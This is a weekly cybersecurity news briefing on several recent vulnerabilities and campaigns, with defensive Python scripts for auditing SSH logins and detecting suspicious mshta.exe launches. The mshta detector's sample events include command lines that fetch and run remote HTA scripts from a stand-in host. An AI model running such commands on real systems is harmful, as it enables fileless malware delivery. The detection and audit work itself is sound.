Cybersecurity Weekly Briefing, 16-22 May

May 22, 2026

Cisco patches a zero-day vulnerability with a perfect CVSS score of 10.0 exploited by UAT-8616

Cisco has released a patch for CVE-2026-20182 (CVSSv3 10.0 according to Cisco), a critical-severity authentication bypass in Cisco Catalyst SD-WAN Controller and SD-WAN Manager that allows an unauthenticated remote attacker to gain administrative privileges via specially crafted packets against the vdaemon service (UDP 12346). Cisco Talos attributes the exploitation to the UAT-8616 group, the same actor that has been exploiting vulnerabilities in Cisco’s SD-WAN infrastructure since at least 2023 and which previously exploited CVE-2026-20127 (CVSSv3 10.0 according to Cisco).

The group attempted to add SSH keys, modify NETCONF configurations and escalate to root, using infrastructure overlapping with Operational Relay Box (ORB) networks. The strategic severity is significant: a compromised SD-WAN controller can redirect traffic, intercept communications and deploy malicious configurations across the entire organisation from a single point of leverage. CISA added CVE-2026-20182 to the KEV catalogue with a three-day remediation deadline for federal agencies.

It is recommended to apply the available patches immediately, audit /var/log/auth.log for unauthorised peering connections, and review the indicators of compromise published by Talos.
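The advice above is to audit /var/log/auth.log for connections that should not be there. The page does not show what the SD-WAN peering entries look like, so the following added example (not Cisco's or Talos's code) sticks to the standard sshd "Accepted ..." log format and illustrates the shape of such an audit: every accepted login is checked against an allowlist of management networks and a set of known public-key fingerprints, and password logins to the controller are flagged outright. The log lines, networks and fingerprints are constructed for illustration.

```python
import ipaddress
import re

# Constructed sample lines in the standard sshd auth.log format (not from the article).
SAMPLE_AUTH_LOG = """\
May 20 10:15:32 vmanage sshd[2345]: Accepted publickey for admin from 10.10.0.5 port 51234 ssh2: RSA SHA256:knownfp1
May 20 10:17:01 vmanage sshd[2351]: Accepted publickey for admin from 198.51.100.7 port 44021 ssh2: RSA SHA256:unknownfp9
May 20 10:18:45 vmanage sshd[2360]: Failed password for invalid user test from 198.51.100.7 port 44100 ssh2
May 20 10:20:10 vmanage sshd[2370]: Accepted password for vmanage from 10.10.0.9 port 50222 ssh2
"""

# Syslog prefix: timestamp, host, "sshd[pid]: ", then the message body.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: (?P<msg>.*)$"
)
# Successful logins only; the key fingerprint is present for publickey auth.
ACCEPTED_RE = re.compile(
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2"
    r"(?:: \S+ (?P<fp>SHA256:\S+))?"
)


def audit(log_text, allowed_nets, known_fps):
    """Return a finding for each accepted login that violates the baseline."""
    nets = [ipaddress.ip_network(n) for n in allowed_nets]
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        a = ACCEPTED_RE.match(m["msg"])
        if not a:
            continue  # failed attempts are noisy; this pass only audits successes
        ip = ipaddress.ip_address(a["ip"])
        reasons = []
        if not any(ip in n for n in nets):
            reasons.append("source outside management range")
        if a["method"] == "publickey" and a["fp"] not in known_fps:
            reasons.append("unknown key fingerprint")  # possible added SSH key
        if a["method"] == "password":
            reasons.append("password login to management host")
        if reasons:
            findings.append(
                {"ts": m["ts"], "user": a["user"], "ip": str(ip), "reasons": reasons}
            )
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_AUTH_LOG, ["10.10.0.0/24"], {"SHA256:knownfp1"}):
        print(f)
```

A real baseline would come from the controller's own inventory of administrator keys; the point of the fingerprint check is that a key added by an attacker is, by definition, one that is not in that inventory.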

Public PoC and active exploitation of the critical vulnerability in NGINX

DepthFirst has published a proof-of-concept exploit for CVE-2026-42945 (CVSSv4 9.2 according to F5), a heap buffer overflow in the ngx_http_rewrite module of NGINX, introduced 16 years ago and present in versions 0.6.27 to 1.30.0, which affects configurations that use the rewrite and set directives. The flaw crashes worker processes, causing restarts and denial of service, with remote code execution possible if ASLR is disabled. Furthermore, VulnCheck claims to have detected active exploitation following public disclosure, which heightens the operational urgency given the widespread use of NGINX as a web server and reverse proxy.

NGINX Plus should be updated to the patched branches and NGINX Open Source to 1.31.0 or 1.30.1, prioritising systems exposed to the internet.

Webworm deploys the EchoCreep and GraphWorm backdoors in Europe, including Spain

ESET researchers have documented new activity by the China-aligned threat actor known as Webworm, which in 2025 expanded its arsenal with two bespoke backdoors: EchoCreep, which uses Discord as a command-and-control (C2) channel, and GraphWorm, which employs the Microsoft Graph API for the same functions, storing files on OneDrive. The choice of legitimate services widely permitted on corporate networks, such as Discord and the Graph API, is intended to blend in with normal traffic and evade perimeter network controls.

ESET notes that the group has abandoned the legacy RATs Trochilus and 9002 in favour of custom proxy tools (WormFrp, ChainWorm, SmuxProxy, WormSocket) that support chained encrypted communications across multiple hosts, in combination with SoftEther VPN. Of particular note is the geographical shift: Webworm has stepped up its operations against European government entities in Belgium, Italy, Serbia, Poland and Spain, shifting its focus away from its traditional targets in Central Asia and Russia.

The initial access vector is unknown, although the group uses open-source tools such as dirsearch and nuclei for web server reconnaissance.

A 0-day vulnerability in Huawei routers, with no CVE or public patch, caused Luxembourg’s telecommunications network to collapse

According to a report by The Record, an unknown vulnerability in Huawei’s VRP operating system was exploited in July 2025 to bring down Luxembourg’s entire telecommunications network for more than three hours, including mobile and fixed-line emergency services. The attack involved specially crafted network traffic that forced the routers of POST Luxembourg, the state-owned operator, into a continuous reboot loop, bringing down critical infrastructure.

Most alarmingly, ten months on, the flaw still has no public CVE, no formal warning has been issued to other operators, and there are doubts as to whether a definitive patch exists: Huawei did not respond to journalists’ questions. The Luxembourg authorities alerted European partners via confidential government channels, but the global technical community has received no notification. Although the authorities found no evidence of an attack specifically targeting POST, the incident highlights the systemic risk posed by undisclosed vulnerabilities in network equipment deployed on a massive scale by telecoms operators worldwide.

Operators using Huawei equipment are advised to check the manufacturer’s support channels for restricted security advisories and to enable monitoring for anomalous behaviour at the control plane of their routers.

The misuse of MSHTA triggers LOLBIN-based malware campaigns on Windows

Bitdefender researchers warn of a significant increase in the use of mshta.exe, a legacy Windows utility, as an execution vector for fileless infection chains. This binary, present by default on Windows systems, allows HTA scripts to be executed and is being widely used to deploy stealers such as LummaStealer, loaders such as CountLoader and persistent threats such as PurpleFox.

The attacks combine phishing, pirated software and techniques such as ClickFix to achieve in-memory command execution and deploy payloads without leaving a trace on disk, making detection by EDR difficult. The scale of the abuse, ranging from mass campaigns to advanced intrusions, demonstrates the persistence of the Living-off-the-Land model.

It is recommended to restrict or block MSHTA in environments where it is not required, as well as to strengthen controls over PowerShell and scripts.
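Where MSHTA cannot be blocked outright, the alternative is to alert on the launches that do not match legitimate use. The following added example (not Bitdefender's code) runs a few heuristics over constructed process-creation events modelled on Sysmon Event ID 1 fields: mshta.exe started with a remote, UNC or protocol-handler source rather than a local .hta file, started by an Office or browser process, or started from explorer.exe with a non-local source (the pattern a user-pasted ClickFix command produces). The events, paths and domain are constructed for illustration.

```python
import ntpath
import re

# Constructed events with Sysmon-style fields (not from the article).
SAMPLE_EVENTS = [
    {   # vendor help file opened by the vendor's own application: expected use
        "image": r"C:\Windows\System32\mshta.exe",
        "cmdline": r'mshta.exe "C:\Program Files\Vendor\help.hta"',
        "parent": r"C:\Program Files\Vendor\app.exe",
    },
    {   # document opened in Word spawns mshta with a remote source
        "image": r"C:\Windows\System32\mshta.exe",
        "cmdline": "mshta.exe http://example.invalid/update.hta",
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
    {   # launched from the shell (Run dialog) with a remote source
        "image": r"C:\Windows\System32\mshta.exe",
        "cmdline": "mshta.exe https://example.invalid/check.hta",
        "parent": r"C:\Windows\explorer.exe",
    },
    {   # unrelated process, ignored
        "image": r"C:\Windows\System32\notepad.exe",
        "cmdline": "notepad.exe readme.txt",
        "parent": r"C:\Windows\explorer.exe",
    },
]

# Parents that should not normally be spawning an HTA host.
DOCUMENT_OR_BROWSER_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "chrome.exe", "msedge.exe", "firefox.exe",
}
# URL, UNC path or script protocol handler in place of a local .hta file.
NON_LOCAL_SOURCE = re.compile(r"(https?://|\\\\[^\\\s]+\\|vbscript:|javascript:)", re.I)


def classify(event):
    """Return the list of reasons an mshta.exe launch looks suspicious ([] if benign)."""
    if ntpath.basename(event["image"]).lower() != "mshta.exe":
        return []
    parent = ntpath.basename(event["parent"]).lower()
    non_local = bool(NON_LOCAL_SOURCE.search(event["cmdline"]))
    reasons = []
    if non_local:
        reasons.append("non-local HTA source")
    if parent in DOCUMENT_OR_BROWSER_PARENTS:
        reasons.append("launched by document or browser application")
    if parent == "explorer.exe" and non_local:
        reasons.append("launched from explorer.exe with non-local source")
    return reasons


def detect(events):
    """Yield (index, reasons) for every event that triggers at least one heuristic."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]


if __name__ == "__main__":
    for idx, reasons in detect(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["cmdline"], reasons)
```

The first event shows why a bare "mshta.exe was executed" rule is too noisy for many fleets: the heuristics key on the source of the HTA and on the parent, which is what separates vendor help files from fileless delivery.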
